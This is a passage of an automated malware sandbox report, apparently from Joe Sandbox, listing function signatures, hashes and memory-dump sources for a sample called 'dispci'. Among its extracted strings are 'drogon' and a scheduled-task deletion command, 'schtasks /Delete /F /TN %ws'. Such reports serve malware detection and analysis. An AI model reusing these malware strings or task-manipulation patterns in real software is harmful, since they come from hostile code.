                                                                      Similarity
                                                                      • API ID: Create$DirectoryEnvironmentProcessSystemThreadVariable_vswprintf_slstrcat
                                                                      • String ID: drogon$schtasks /Delete /F /TN %ws
                                                                      • API String ID: 2360524982-1803547564
                                                                      • Opcode ID: 4249ce67a6d45e64575aa6a059fbb4530cfe13e5a76dbd1d23fd920c6fd3bd9b
                                                                      • Instruction ID: 56239580d789cda269929a81757d0718dc937161b789b92f1876265e326c5e7d
                                                                      • Opcode Fuzzy Hash: 4249ce67a6d45e64575aa6a059fbb4530cfe13e5a76dbd1d23fd920c6fd3bd9b
                                                                      • Instruction Fuzzy Hash: FBF0657078170CBBE610BB60AC47F7A7B64D704B00FA14164B7067A2C6D9A17D5C4AA4
                                                                      Function 00DF78A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.1802555630.0000000000DF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DF0000, based on PE: true
                                                                      • Associated: 00000017.00000002.1802527873.0000000000DF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802587914.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802625442.0000000000E08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.1802668600.0000000000E3E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_df0000_dispci.jbxd
                                                                      Similarity
                                                                      • API ID: DecodePointer__invoke_watson
                                                                      • String ID: P\
                                                                      • API String ID: 4034010525-198795799
                                                                      • Opcode ID: f12c1e5a5547e5c882b7beb5c8affbf8befa6fe60a19b0f7b74a1eacd07b0b59
                                                                      • Instruction ID: bf27538581b4cfc4d86852c37667fd8dda5724becf1ccd1740d6694cfa79550e
                                                                      • Opcode Fuzzy Hash: f12c1e5a5547e5c882b7beb5c8affbf8befa6fe60a19b0f7b74a1eacd07b0b59
                                                                      • Instruction Fuzzy Hash: 78E0B67240410DBFEF052FA29C09CBA3E6AEB443A0B458420FE1484032D636C9B4EBB4